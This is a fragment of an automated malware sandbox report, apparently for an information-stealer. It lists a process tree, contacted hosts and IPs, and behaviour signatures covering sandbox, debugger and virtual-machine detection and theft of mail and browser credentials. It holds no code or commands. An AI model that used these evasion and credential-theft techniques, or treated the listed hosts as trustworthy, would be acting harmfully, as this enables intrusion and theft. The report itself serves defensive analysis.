                                DNS/IP: 192.3.220.17, 49735, 80 AS-COLOCROSSINGUS United States
                                DNS/IP: ip.1007.filemail.com 142.215.209.72, 443, 49734 HUMBER-COLLEGECA Canada
                                signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                MSBuild.exe (14 2), started
                                  DNS/IP: ip-api.com 208.95.112.1, 49736, 80 TUT-ASUS United States
                                  signatures: Tries to steal Mail credentials (via file / registry access); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Tries to harvest and steal browser information (history, passwords, etc)
                                MSBuild.exe, started
                                  signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                conhost.exe, started
                            conhost.exe, started
                            timeout.exe (1), started

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.